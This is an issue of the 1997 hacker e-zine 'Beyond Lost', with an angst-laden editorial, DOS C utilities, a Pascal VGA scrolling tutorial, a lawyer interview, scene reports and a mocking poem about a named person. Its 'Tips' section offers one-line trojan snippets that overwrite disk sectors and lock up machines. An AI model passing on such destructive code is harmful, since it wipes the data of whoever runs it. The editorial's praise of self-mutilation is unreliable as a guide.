"We fight a battle [-------------------------] everyday & everyday ] -=Beyond Lost=- [ rybread@anok4u2.org we loose, but keep [ Number One ] www.connix.com/~rybread/ on fighting. We suck." ] "Teenage Angst Is Shit" [ beyond.html [-------------------------] What Is It? -=====================================--=====================================- If you don't know, then ask your mom and dad. Seriously. This is an e-zine for lots (lost) of different peoples. Those in the 203 scene will prolly like it or at least be able to gulp it down. Haquers, Doodle Boys, Lepers and even an occasional Warez D00d will find a moment of nice-nice in this vanilla dome. Have fun. -unix--kills--windows--dead--unix--kills--windows--dead--unix--kills--window-- Table of Contents: What is it? Table of Contents Editorial "Why `Beyond Lost': Beyond Angst" by Rybread UNI(X)fying DOS with the letter C++ by Khelbin THRST3: Using your Text Video RAM for Perverse "ANSI" Practices (Pascal Code UUENCODED) by The Hac Ripped ASCII of the Month by Rybread Interview with a Cyberlawyer: Dorsey Morrow Jr Why ASCII Strips Don't Work by Rybread Points 2 Ponder by The Masked Avacado 2600 in 203: January by Khelbin "Poor Little Aculard" a Poem About The Lame by Spy Tech Tips from Khelbin Review of cDc's 97 t-filez by Rybread Philosophy with Khelbin CONTEST: Ode to Atari Programmers Classical Children's Lit. The Minutes of 203 Next Issue and Other Notes Masthead Editorial: I came to a realization after my much troubled and depressed freshman year: Teenagers suck. What I mean is that for all are bitching, whining and "experimenting" nothing good comes from it. So the next time teenage angst came looking for me, I told it to go to hell. It told me to get lost. Now I'm beyond lost. Wasn't that poetic? Looking back at that last paragraph makes me again think of teenagers and my intolerable hatred for them, most possibly because I am one. I hate what I wrote, not the content but the style. Too bad it's mine. Enough self- reflection. Emotion is something that I seem to lack, except in sporadic bits of pain and pleasure that happen during a moment. During a moment may sound like the present but is most defiantly the past. A tough idea to fathom? Maybe. I don't get depressed anymore for than 5 seconds at a time, it succumbs to this new feeling of hollowness, which I identify with being beyond lost. Will I always be lost? That�s the very reason I hate teenagers with all there, "My parents are divorced", "I shoot up heroin", "All my friends suck", whineologies. Teenage angst should never be pitied, it should raise anger. The thing is that 99.99% of what most teenagers do is totally pointless and doesn't make a difference and they�ll denounce most of their choices and beliefs once they are "grown up". When your beyond lost, it takes so much effort just to get to the point of simply being lost, but you'll prolly get out of it as soon as you conform or grow-up. As if there is a difference. Hmm. I reflect back at what I wrote and realize that this idea is just too much for me to put down in words at this moment, but it is most defiantly real. Too make it simple: I've seen the world, and man in particular, through my own tainted view and have acknowledged it as such. I don't find anything at the root level of mankind to be "there" enough for me to show more emotion or expression then one can muster from the expansion of the moment. Nothing makes me really happy or sad, no extremes. I miss the extremes. Perhaps being hollow or empty is a form of depression, but if this is so, there is most defiantly a schism going on between them and modern man. If your empty your not depressed, I swear. It can be confused with depression but it lies in its own glorious realm of pain. One last example. A friend of mine, whom I believe is also beyond lost, had an abortion. Boohoo, right? Not really. To get it out of the way, no I'm not the father you yucky minded people. Was this a sob story? No. The pity people gave her, she used either as survival, playing off it, or totally dismissed it. I did not pity her after the first moment of my knowledge. Moments can be dangerous. We named the fetus and played games with it and made jokes, and not to cover up uneasiness, but because we did. That's are identity, more true in public charades then we can feel in are solitude. Then she had the abortion and it was other, she didn't cry and I believe it when she says she doesn't harbor any hidden sadness agenda [Sadness Agenda? Sounds like a Smashing Bumpkins song!] or whatnot. I never felt bad about it or the games, it was occupation in a dull world. I miss the extremes. I did feel bad however, I think I did anyway. I didn't feel bad about what I had done, I felt bad about how I should of felt for what I have done. So I emulated the pain, or the "feeling bad". Well, emulation is used a lot, and very well in are race, defiantly to a potion where most are ignorant of it. What I did above most people do, but hide it so much. I define emulation as artificial means to getting the real thing or a reasonable facsimile. We don't love, hate, shame, or anything anymore, except during those dangerous moments that soon leave. We emulate are emotions, we are becoming machines. You shouldn't make fun of people who practice self-mutilation, pain is a very real thing and it can make a moment linger, a very hard trick to do. Cause when the moment fades your left with a memory, that can be fuel for the emulation process, but itself a very poor imitation. So in summary, most are already beyond lost but find their way back in the falsehood of familiarity known as conformity. The rebellion gene, like a match, bursts into a furious uproar for a short time, the teenage years, and quickly dies down with only a few cherry embers left. A few can keep lighting matches, and these are the people that don't exist. Well, enough philosophy for right now. So what will Beyond Lost be about? I'd like to make into an omniscene e-zine for 203/860. So that means, humor, computer stuff, phracking, music, art, and coding. Just remember who you are and how much it hurts to be a thinking machine, if you let yourself really think. Pain be good gumbo. :) Rybread Celsius aka The Child aka DayEight "So many handles, such a little memory!" """""""""""" -----------------------------------="""""""""""" <--- Toothbrush UNI(X)fying DOS with the letter C++| by Khelbin" -----------------------------------="""""""""""" I know some people have been asking about running UNIX but they don't want to give up DOS and they say they can't find WABI or SoftWindows and they don't have money to pay for those programs and blah blahabalah... Well here's another alternative. Go to http://cccsat.sorostm.ro/pub/simtelnet/gnu/gnuish/ms_sh and you can get a unix-like shell for DOS and some unix-like programs that run in DOS. It's nothing compared to real unix but maybe it's a place to start. Also, I wrote a cheesy little lpr program in C. It works find on my printer but I seriously doubt it would be great for the masses (I wrote it cuz there was no lpr in those unix-like utilities). Well, here it is if you want: #include #include void prn(char *argv); void frmt_pg(void); int main(int argc, char *argv[]) { if(!(argc == 2 || argc == 3)) { printf("\nUsage: lpr [-e] \n"); exit(1); } /* I should have used pointer notation to throw off any new C programmers :) */ if(argv[1][0] == '-') { prn(argv[2]); fputc('\x0C',stdprn); } else prn(argv[1]); return 0; } void prn(char *argv) { FILE *fptr; char buff[81]; int lcnt=0; if( (fptr = fopen(argv,"r")) == NULL) { printf("\nCould not open file %s\n",argv); exit(1); } frmt_pg(); while( fgets(buff, 80, fptr) != NULL) { fputs(buff, stdprn); putc('\r',stdprn); if(++lcnt == 58) { n_pg(); lcnt = 0; } } fclose(fptr); } void frmt_pg(void) { int i,j; for(j=0;j<4;j++) { for(i=0;i<81;i++) fputc(' ',stdprn); fputc('\r',stdprn); } } void n_pg(void) { int i,j; for(j=0;j<4;j++) { for(i=0;i<81;i++) fputc(' ',stdprn); fputc('\r',stdprn); } frmt_pg(); } Feal free to modify it. I wrote it in 5 minutes and then debugged it in another 5 minutes so I'm sure it's nothing great. The n_pg() and frmt_pg() functions do a little formatting that's probably specific to my printer. I'm not sure.. I really don't know much about printers since I've only had one for about three weeks now but if you print something more than one page on mine, when it starts printing on the next page, it loses about 2 lines of text (this is when doing a simple "type > PRN". Here's something that goes good with that little notice about UNIX utilities under DOS: In continuing with making DOS look more UNIX-like (really, get the shell and utilities I told you about if you can't give up DOS), here is a man program for DOS which I whipped up. This time it took me even less time and I'm not a great coder so I'm sure there's improvements but it works. #include #include #include #include /* Change this to the path to your man pages */ #define MANPATH "c:\\usr\\local\\man\\" /* Change this to the extensions on your man pages */ #define MANEXT ".man" void main(int argc, char *argv[]) { FILE *fptr; char count=0; char buff[81] = MANPATH; char *file_ext = MANEXT; if(argc != 2) { printf("\nUsage: man \n"); exit(1); } strcat(buff,argv[1]); strcat(buff,file_ext); if( (fptr=fopen(buff,"r")) == NULL) { printf("\nman: no man entry for %s\n",argv[1]); exit(1); } while( (fgets(buff, 80, fptr)) != NULL) { fputs(buff,stdout); if(++count == 21) { printf("\n--More\n"); count = 0; if(getch() == 'q') exit(0); } } } If you have access to a UNIX box, you can borrow their man pages. Unfortunately, if you do a "man > " you will get a bunch of escape codes in there. You can easily circumvent this by piping it through col. Exmaple: man diff | col -b > dif.man. You'll probably want to put in linefeeds for dos too right now. On connix the program to do this is called bsd2dos and most boxes have some type of program to do this. Here's a finalized example so you don't get pissed because you have to think: man diff | col -b | bsd2dos > diff.man If you know sed, you can filter the control shiz out that way too. Also, through Altavista, I have been able to find a version of Awk, gzip, gunzip, vi, uuencode, uudecode, and sed for DOS. [The version of C I got also comes with the god of Unix commands, grep!] Pretty soon your computer will be quite mutated. oh, the MS-SHELL I mentioned can be very usefull although it does have one bug that I discovered. When exiting my TC++ IDE, my computer will hang. Also, batch programs run a lot slower and if there is a directory with tons of files, the ls program sucks. Nevertheless, it has many advantages also and you can easily just type exit and you're back in DOS. /* rm2.c compile with "gcc -o rm2 rm2.c" I know this is quite lame but it could come in handy for someone who would like to delete a file which they have write access to and is owned by another user and resides in a world writeable directory with the sticky bit enabled (like /tmp). It actually doesn't delete a file, but resets the file to 0 bytes, destroying any data previously in the file. Note: File deletion is based on the current directories permission, not the files mode itself. In this aspect, the sticky bit is useful for files with correct permissions. */ #include #define MAX 80 /* increase for large filenames */ int main(int argc, char *argv[]) { FILE *fptr; if(argc != 2) { printf("\nUseage: rm2 \n\n"); exit(1); } if( (fptr = fopen(argv[1],"w")) == NULL) { printf("\nCannot remove file %s\n\n",argv[1]); exit(1); } printf("\nFile %s has been destroyed\n\n",argv[1]); } /* Oh yea, I forgot that you could just do a wc -l on the file, vi it, and then just ndd it and then save it (where n is the number of lines wc reported). oh well.. if you're in this area code you probably don't gno how to use vi anyways and would prolly just pico it and then block the whole file and kill the block and then save so I guess this would save you a lot of time after all. [Isn't he cute folks?] The lesson to learn here is that the sticky-bit is not some god-like permission that will keep your files safe. Vorrect file permissions should always be present. Not that this hasn't been known for some time but rybread needed more stuff for his e-mag and I wasn't about to let that space be filled with ANSI art or shit like that! :) [ANSI? Never, though maybe an ASCII...] */ --- /* Ok, so I was sick of not generating any good code for you and just getting something that "worked" so heres an addition to that shell for DOS that I'd say *is* good code and optimized. Since cls isn't a DOS executable, when you load up the UNIX shell for DOS, you have no way to clear the screen. The utilities package don't have a clear program either so I wrote this one. I know it'd be easier to use the clrscr() function but I think this might run faster than that. Anyways, I was bored and felt like I had to stop writing rinky-dink code */ #include #include void main(void) { union REGS regs; register i; int far *vramptr; vramptr = (int far *)0xB8000000; /* change to 0xB0000000 if you have a */ /* text-only monitor */ for(i=0;i<2000;i++) *(vramptr + i) = 0x0700; regs.h.ah = 2; regs.h.dl = 0; regs.h.dh = 0; regs.h.bh = 0; int86(0x10,®s,®s); } -khelbin / 9x email: khelbin@connix.com [NOTE: uuencoded files at the end of this version of the tutorial!] ------------------------------------------------------------------------------ ��� � � ��� � � ���� ���� �� �� (oooh, that � ��� �� ���� ���� � ��� BGI look!) � � � ��� � � � � ��� �� ��������۲�� ������۲��������۲��۲���������۲�� ���������۲�����۲�����۲�� ����۲���۲������۲���۲��������۲�۲����۲����۲�����۲�����۲������۱���۲�� ��������۲������۲�����۲�����۲���۲����۲����۲�����۲�����۲����۲��۲�۲�� ����۲�۲�� �����������۲�����۲���۲����۲����۲�����۲�����۲����۲�����۲�� ����۲���۲�����۲�����۲�����۲���۲���������۲�� ���������۲�����۲�����۲�� �������۲�����۲���۲���������۲�� ��������۲���������۲����������������۲�� �����۲�� ����۲���۲�����۲���۲� ����۲�����۲�� ����۲������۲�� �����۲������۲���۲���������۲�� ����۲���������۲�����۲������۲�� ����۲�����۲���۲�����۲���۲�����۱����۲�����۲�� ����۲������۲�� �������۲�� �������۲����������۲�� ��������۲����������۲��������۲���۲�� tutorial! ------------------------------------------------------------------------------ Covering everything and nothing concerning programming and classic true hacking completely at random. ------------------------------------------------------------------------------ -=- Episode 3 -=- Using your Text Video RAM for Perverse "ANSI" Practices (or, using the VGA card to scroll big pictures) -=- 01-27-97 08:21pm -=- ------------------------------------------------------------------------------ This crap AGAIN?? Doesn't he LEARN not to write these things? Nope. Anyways, here's sort of a continuation of our last little jaunt into programming land. This time, we'll go over using the 64k of text mode video memory in everyones video card to do some good old fashioned scroll'n. Consider this: This is video memory at $B800... �� ����������������������Ŀ ķ One Ķ � PAGE 0 � �� 4000 bytes, or ONE 80x25 text screen 80x50 � ����������������������Ĵ Ľ text � � PAGE 1 � Page 0 starts at $B800:0000 screen �� ����������������������Ĵ Page 0 ends at $B800:3FFF 8000 bytes � PAGE 2 � Page 1 starts at $B800:4000 ����������������������Ĵ " 1 ends at $B800:7FFF � PAGE 3 � " 2 starts at $B800:8000 ����������������������Ĵ and so on... � � | and so on... | (There should be 16 of these pages...or � � 8...I forget...find out for yourself...) (4000 bytes for an 80x25? Yup. 2 bytes per character...char and attribute...((80*25)*2)...) Building on what we learned last time, we can stow our binary text image at $B800:0000, since VGA text modes are, under normal conditions, defaulting to page 0... Every 100% compatable VGA card can move it's internal "where do I start" pointer to wherever you want in the $B800 segment...this is how we do our scrolling...we can take an 80x100 ANSI, and use the pseudo-socially-acceptable TheDraw program to convert that bastard ANSI into binary format...you should have a 16000 byte binary dump now. BINOBJ that bastard, move the image with a swift "move(@yourimagehere^, mem[$B800:0000], 16000)" to the jaw...from here, you need to access the video offset register. Code to do this is included in BIGBOOTY.PAS, of course. It's straightforward assembler...don't get too confused now. We sync to the VSYNC in there to smooth things out...I'd recommend NOT including it in there, and sticking it in manually, but hey, thats YOUR perogative. You feed the register (or the procedure in this case) an OFFSET into the video ram...so, if we wanted to flip between page 0 and page 1, we can do this: setoffset(4000); {page 1} setoffset(0); {page 0} You can do some nifty tricks with just that for some cheap high-speed text mode animations...double buffered text mode game...not to shabby...try it. NOW....GODDAMN YOU!! WRITE IT!!! COME ON!! ABUSE ME!!!!!!! WHAAAAAAAAAAAAAAAA............. Anyways...to SCROLL downward, we can do this: {------------} var y:byte; begin put_that_bitch_ansi_into_video_memory; for y:=0 to 99 do setoffset(y*80); end. {------------} And off it goes...kind of makes a tear fall into my beer......*sigh*...oh well... So...in the end: EXAMINE THE PROCEDURE...it's mostly assembler...KNOW WHY IT WORKS...and for GOD SAKES STOP TOUCHING ME THERE! -- The Hac hac203@geocities.com 01-27-97 08:44pm L EEE TTTTT TTTTT H H EEE CCC O DD EEE Begin L E-- T T HHH E-- C O O D D E-- Begin LLLL EEE T T H H EEE CCC O DD EEE Begin -----BIGBOOTY.PAS---[START]------------------------8<-------------------- { We'll load an 80x100 text block and pan from the top to the bottom.... Feel free to gimp this code for your own uses. -- TAD } var y :word; {��������������������������������������������������������������������������} procedure bigansi; External; {$L BIGANSI.OBJ} {Our "ANSI"...} {��������������������������������������������������������������������������} {This waits for a vertical retrace to reduce snow on the screen and perform a simple timing function..."makes things smooth"} Procedure VSinc; Assembler; Asm mov DX, 3DAh @@l1: In AL, DX And AL, 08h jnz @@l1 @@l2: In AL, DX And AL, 08h jz @@l2 End; {��������������������������������������������������������������������������} Procedure setoffset(Saddr : Word); VAR lb , hb :byte; Begin lb:=hi(saddr); hb:=lo(saddr); vsinc; ASM MOV DX,3D4H MOV AL,0DH MOV AH,[HB] OUT DX,AX MOV AL,0CH MOV AH,[LB] OUT DX,AX End; End; {��������������������������������������������������������������������������} Begin move(@bigansi^, mem[$B800:0], 16000); {move(@bigansi^, mem[segB800:0], 16000); for protected mode use} readln; {wait for some input} for y:=0 to 99 do begin setoffset(y*80); end; {scroll that puppy} setoffset(0); End. -----BIGBOOTY.PAS---[END]--------------------------8<-------------------- -----BIGANSI.OBJ----[START]------------------------8<-------------------- begin 644 bigansi.obj M@`0``CHZ!I8(```$0T]$10!#F`<`*(`^`@$!=Y`.```!!T))1T%.4TD```!= MH`0$`0``(`\@#R`/(`\@#R`/(`\@#R`/(`_:#\0/Q`_$#\0/Q`_$#\0/Q`_$ M#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/ MQ`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$ M#\0/Q`_$#\0/Q`_$#\0/P@_$#\(/P@_"#\(/P@_"#[,/(`\@#R`/(`\@#]H/ MQ`_$#\0/V0\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/ MV@_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#\(/Q`_$#\0/Q`_$#\4/P@_% M#\4/P0_%#\4/M`^S#R`/(`_:#\0/Q`_9#R`/(`\@#R`/(`\@#R`/(`\@#R`/ M(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`\@#R`/V@_$#\0/Q`_$#\0/Q`_$#]D/(`\@#R`/(`\@#R`/(`\@#R`/ M(`_:#\(/Q`_!#\0/Q`_$#\(/Q`_!#\4/P0_%#\0/Q0_%#[0/LP_:#\0/V0\@ M#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/ M(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#[,/(`\@#R`/(`\@ M#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/P`_9#R`/(`\@#R`/V@_!#\0/ MP@_%#\(/P0_"#\$/P0_9#\,/V0\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/ M(`\@#]H/Q`_$#\0/Q`_9#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`\@#R`/(`\@#R`/(`\@#\`/Q`_$#\4/P0_%#\0/Q0_$#\0/Q`_##\0/ MOP\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`^S#]H/Q`_$#\0/Q`_$#\0/ MQ`^_#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@#R`/(`\@ M#R`/(`_`#\0/V0\@#\`/Q`^_#R`/LP\@#[,/(`\@#R`/(`\@#R`/(`\@#R`/ M(`\@#R`/(`\@#R`/(`\@#R`/V@_$#\0/Q`_$#\0/Q`_$#\0/Q`_$#]J@!`0! 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Well, first off tell me a bit about yourself and what you (any others?) do? I am a former software engineer. I have been in private practice for the past three years. I handle approximately 50% criminal & 50% civil (mostly plaintiffs cases & computer contracts). I represent several small and medium sized software companies. I work alone. I have represented several hackers of the past year. Fortunately I was able to keep their cases from ever going to trial. One case involved a Ph.D. student in Electrical Engineering at a major University who was hacking a system in Canada through an anon server. He was tracked down and the police were notified. We kept it to a level where he was made to do 40 hrs community service by the University - no other record or punishment. The student was quite fortunate. Before entering the law I worked in the computer industry for approximately 10 years employed as a systems manager, programmer, analyst, and a consultant. Enjoyed the work, but I realized, none of the attorneys I spoke with knew anything about computer law. I figured I would jump in and try it. Anything else? >You have defended hackers, but have you ever defended any phreakers, ones >who mess around with phones, Ma Bell, and the like? No. The closest I have come to those issues is advising drug defense attorneys on federal agencies who access cell phone records (how its done, what the legalities are, etc.). >Do you have any feeling on knowledge and if and how it should be distrubted? >In other words, can you condone hacking? I disagree with the left wing hacker who feels everything belongs to everybody and knowledge should be free to all. Seems to me the communist tried that on a grand physical scale and their economy & government collapsed. Knowledge is acquired only after someone has worked hard to achieve that knowledge. The knowledge someone acquires will eventually be public domain, but the person who spent time, money and/or other resources acquiring that knowledge must be rewarded, otherwise what incentive is there to acquire knowledge. I spent 5 years in undergraduate school, 3.5 years in law school and over $50,000 to get the degrees I have. Why would I do that if I then had to give up what I knew for free. There is no incentive. The "knowledge is free" concept is basically the same thing Karl Marx suggested decades ago. However, as the Russians found out, you must give people an incentive to work. No one works for the good of all society. They work to improve their position in life. Why would companies spend billions of dollars on R&D and then give away what they discovered? They certainly would not be in business long if they did. When it comes to the government I feel that the knowledge/information they have should be free and open. But let me qualify that statement by allowing an exception for national security issues and personal information. But for all other information - our tax dollars helped to create that knowledge and we therefore are entitled to it. As to condoning hacking. I feel that hacking serves a purpose. You learn how things work. You learn strengths & weaknesses of systems. You become knowledgeable. Hackers should put their skills to work. Work with other hackers, learn their skills, attack their systems (with permission). When you are good enough, work with businesses to improve their security and systems. Many businesses pay hackers to expose their weaknesses and help them resolve problems. Hacking is nothing more than pushing the envelope to discover new methods of doing things. However, hacking a system without permission is illegal. I do not condone unpermitted access to another's system. This crosses the line from hacking to "cracking". >Also, what is your ideal political structure? Our current form of government with changes. I would make it where the government is not as involved in every aspect of our life. The more government does, the less it does well. Our forefathers only intended our government to do those things that we as individuals cannot do (i.e. National Defense, build roads, provide public services). It seems that present day government has gotten into everything and we have the tax burden to prove it. The federal government has also undertaken an area of law it has no business in, criminal law. When the constitution was written there were only two crimes - Piracy & Treason. The federal government now has criminal laws for everything, basically duplicating the laws of each state. >How do the statutes of limitations work on hacking? After 8 years your >innocent or something like that? That is a very difficult question to answer because statutes of limitation work differently from jurisdiction to jurisdiction and from law to law. In other words, what may be the statute of limitation for Alabama on a particular crime, may not be the same in Colorado, or in the Federal jurisdiction. Also, by committing one illegal act you may have violated multiple statutes with varying time limitations. It would be safe to say that limitations on prosecution vary from as short as 1 year to indefinitely. >How much do you bill an hour? My rates vary. For non-computer related cases I charge $100/hr out of court & $150/hr in court. For computer related cases or intellectual property (copyrights, trademarks) I charge $200/hr out of court & $300/hr in court. >You being a lawyer, I was wondering if you would ever let morals get in your >way, or do you leave all personal preferences behind? I attempt to leave personal opinions at home. Every person in the U.S. is entitled to legal representation and the best defense possible of any criminal charge. There are certain cases that I refuse to take: Sexual assault (Rape) and child abuse. My personal feelings are too great for me to overlook in those instances and I therefore refer them to another attorney. Beyond that I feel I can give anybody the best defense possible regardless of my feelings. >Interesting. Well, from the list of your degrees and what you told me, I >know you are a very qualified computer specialist. You ever hack? What's >the best hack you ever pulled off? I once hacked a university's computer at their request. They were locked out of a certain area of their system and could not get back in. The methods I used were nothing fancy and could have been done by anyone with a basic knowledge of CIS, but the university was certainly grateful. >Planning on making it to any confs., Beyond HOPE possibly? Not in the near future. My caseload has increased dramatically which tends to curtail extracurricular activities. >Do you like the phone company? I have not had any problems with them yet. I guess as long as I pay my phone bill they will leave me alone. >I first heard about you from your add in 2600. Do you read 2600 and if so >any general opinions on it and how its going (decling)? also how long have >you been reading it? I read 2600 to see what the latest techniques are and what the latest consensus is in the hacker community. 2600 has a number of qualified and impressive contributors, but it also allows a lot of yahoos who merely want to see what they wrote in print, regardless of the fact that it has no value. I have read 2600 only for the past year. I monitored it across the web for about 2 years prior to that. >I gotta know your opinons on the Bernie S. saga, especially what you thoguht >of the transcripts printed in 2600. I can only say that much of what I have heard reported by various hackers & underground magazines should be taken with a grain of salt. Much of what they report is from an uneducated or misinformed viewpoint. You have to remember the federal judiciary is a very meticulous and structured beast. I have yet to come across anything like it at the state level. There are formal hearings for EVERYTHING! The protocol used leaves no room for informality. So it looks to many who are unaccustomed to this environment as if it is a kangaroo court, which it is not. You really have to listen to both sides. Somewhere in the middle ground is the truth. By saying that I do not mean to discount the reports regarding Bernie, merely that you have to carefully consider who says what. As to the reports of the Secret Service: I am not surprised. The Secret Service's responsibilties have grown tremendously over the past decade. They are now required to keep up with a high tech area which only a handful of them truly understand. They take their job seriously. And at times, too seriously. You must remember when any law enforcement agency is challenged, as with almost any person, they get bent out of shape, bow up and FIGHT. So it does not surprise me that there were some agents who did not fully understand the equipment that was involved and what Bernie S. was doing with it. And when he challenged them, they intended on coming out on top. Lesson here? When confronted by law enforcement always take a submissive posture and say NOTHING! Let your attorney handle things. >An opinions on the EFF? They are doing a great job - particularly covering legislation that has an impact on computers and the Internet. It seems that both state and federal legislators are enacting stupid laws regarding computers just so they can be politically correct or known for their "great" service. But most do not consider the ramifications and create a quagmire when the law slams into reality. The EFF has done a great job of not only tracking this, but also of getting involved. More power to 'em. >An opinions on the PGP? The program is great! It will certainly help me in my job by providing certification and authentication for computer evidence. Phil Zimmerman is quite remarkable. He developed this incredible program AND he made it freeware. I think he has moved in the right direction by creating a company, marketing his product, and making money. I firmly believe he will do well in the coming years. The USPS is talking about doing the same thing, but they can't even handle snail mail. What do they think they can do? Make the Internet slower? I believe there is a strong possibility that PGP will become the de facto industry standard. >Time for some pulp stuff, what are your favorite URLs and the like? I don't believe I have a particular favorite URL. I do enjoy visiting car manufacturers' websites. I also like to visit Edmunds to see the latest features, costs, specs on various cars. I generally just bounce around visiting law-oriented sites, technology sites, and whatever else I might run into. I get the biggest kick out of paranormal websites. I love to see where UFOs have landed and are setting up the new world order. Heck, maybe they'll even make me President or something. >Where do you see technology going? Wow. The possibilities are almost endless. Especially when you consider where we were 10 - 15 years ago. I remember when I was astounded at seeing a 10 megabyte hard drive on an IBM PC XT. Now we have computers with 1000 times the power. 2 gigabyte capacity hard drives. ISDN lines. SVGA graphics. Laptops that weigh under 7 pounds. I am excited to see what is going to be available just in the next 5 years. _____ =STATS= Name: Dorsey Morrow Jr Handle: E-Mail: cyberlaw@mont.mindspring.com Schooling: BS degree in CIS JD degree Worked on a Masters in MIS but have not completed. Age: 30 Maritial Status: Married. 1 child. [Sorry ladies! :) ] Free advice: If you are ever arrested or asked "a few questions" by law enforcement - do not answer anything without an attorney, no matter what they promise you. I have had more clients tell me that the cops said they would go easy on them if they would just tell them what happened. Don't believe that. Favorite movie: Any Star Trek movie. Favorite food: Pizza. 1011100000101010101101Why ASCII Strips Don't Work by Rybread110100011101101110 ___ A Differant Type of SuperHero: Super Zero! � o \ Not too be confused with PBS Man. ����- Land planes on his head! /����b Marvel at his ASCII threadz. //�� See him hitchhike to go places! // ���> ���> Watch him sniff glue! See? It just don't work. If any k-rad ASCII artists want to proove me wrong and submit there ASCII strip, you know how to reach me. PPP 222 PPP Points 2 rednoP Has anyone ever actually been to an abandoned warehouse? I've been to many and still have not seen any smugglers, super villians, Quentin Tarrintino, or any other sort of bad guys. Funk dat. If you were to die, why would you give all your stuff up? Wills are crap, your dead, so what do you care, and if there is an afterlife then maybe the Eyptians were right: you can take it with you. Added bonus, 100 years later someone robs your grave and you get in the paper as being remembered for being ecentric. What the hell would happen if Superman got prostate cancer? 60% of men who live "full" lives get it. That's over half! Hehe, bet thats worse then a shot of kryptonite. If farmers were nazi's, would barbers be the gypsies? What the hell is wrong with having hairy palms? Oh, yeah. Nevermind. My driveway is very, very flat. Yet when it rains, huge puddles dot it like it was made of limestone. What's it do, cushion the water? If there was a mosquito the size of an elephant and it impaled someone with AIDS would it get the virus? People with herpes deep down their throat prolly swallow. People shouldn't kick the shit out of people who still were briefs, cause getting hit repeatidly with a hammer sucks. 2222222 6 00 00 22222222 00 33333 2 6 0 0 0 0 2 0 0 3 :: 2 66 0 0 0 0 in 2 0 0 333 2 6 6 0 0 0 0 2 0 0 3 :: 22222222 6666 00 00 22222222 00 3333 January by Khelbin ------------------------------ Background on the Meriden 2600 ------------------------------ The Meriden 2600 meeting first appeared in the Autumn, 1995 issue of "2600: The Hacker Quarterly." For those who are unaware of what 2600 meetings are, I would recommend visiting www.2600.com. The meetings did not last very long as the IIRG, a Connecticut-based hacking group, withdrew support of the meeting. The quality of the meetings quickly deminished although there still were a few meetings which were somewhat worthwhile. In the "last" meeting which took place at Meriden, a person in attendace called in a phony bomb threat and there was a "mysterious" gentleman in suit and tie who asked many questions, took notes, and reportedly was seen entering a "Employees Only" room after the meeting was over. While this was a huge discouragement to the overall underground scene, it was not the only thing which took the meetings out of commision. Obviously the IIRG had reasons other than this for withdrawing and I myself noticed a lack of true hacker-related discussion going on. It just seemed like "another place to hang out". ------------ 2600 is Back ------------ After a long absense due to the previously mentioned problems, the IIRG decided to again attend/sponsor the 2600 meetings in Meriden. The first of these meetings was held in January and February promises yet another meeting (see IIRG Net 2600 base, www.2600.com, or other for meeting information). -------------- Will it Stand? -------------- Will the meeting be able to withstand time? That is entirely up to the people who attend the meetings but could there be a moral to the first downfall of Meriden's 2600? In my opinion, here are a few things which hurt it that aren't as compelling as the bomb threat and the possibility of a fed: * Lack of h/p discussion and questions being asked. * Lack of attendance. * Isolation. This is when one sits with the same two people for the whole meeting. I know we feel more comfortable with those that we know, but c'mon! * "Let's go hang out at the 2600 meeting. I think it's for people that are on bbs' to go and just shoot the shit about whatever goes on in your life and just to have fun. Since h/p shit ain't that fun I think we'll just try to meet new people to party with." ---------------------- Things to Improve Upon ---------------------- * What happens after the meeting can be just as important as what happens at the meeting. I do think we started trashing more after the meetings started up but I'm sure some other stuff could be organized (hint: I'm not bitching here because no one is going to organize something for you. I think the 'initiative' talk has already been given). * Any of the things I mentioned in the previous section's list that are still present fall into the 'Improvement' category. I also think we should have some cool games and shit like they have at some of the cons. Hacker Jeopardy, Spot the Fed, and others. That would rock. And some chicks would be nice too.. yea, chicks. And we could have fire, and killer dogs that will attack anything that sucks, and we could kick all the lamers asses and then hack into that one places computer so that they give us free rootbear floats like the one Black_IC had. That would be cool. ()()()()()()()()()()()()()()()()()()()()()()()()()()()( }"Poor Little Aculard" a Poem About The Lame by Spy Tech{ )()()()()()()()()()()()()()()()()()()()()()()()()()()() Poor little Alucard, a Hacker Wanna-Be Connecticut's Number One Lamer, the perfect nominee. He watched the movie "Hackers", he was sure he could be "Elite" But he found out in the "Real World", he really couldn't compete. Thomas Icom tried to help him, but Alucard stabbed him in the back The little boy has no honor, he will never learn to hack So let him rant and rave, like a little girl he'll whine To bad he's like his father, a lying little swine. [This sums up the story of Aculard (Dracula backwords, scary) pretty much.] [Perhaps at a later date the whole story will be presented. ] <-----------------> |Tips from Khelbin|----------* * * <-----------------> Here's a simple trojan in Pascal. Just incorporate the following line of code into your program. inline($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:} - - - - - - - - - - - - - - - - - - - - - - - - - - - Here's a simple trojan in a far superior language... C abswrite(2, 5, 0,(void *) 0); The next line will lock up a computer. lock: goto lock; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Ok, Threez. I know you wanted a schematic for just a simple project that makes a noise which you can change yourself. I'm not a great electronics person myself but if you have a 10k resistor, 1k resistor, a PNP transistor, a .047 uF ceramic disk capacitor, a 100 uF Electrolytic capacitor, a 0.1 uF ceramic disk 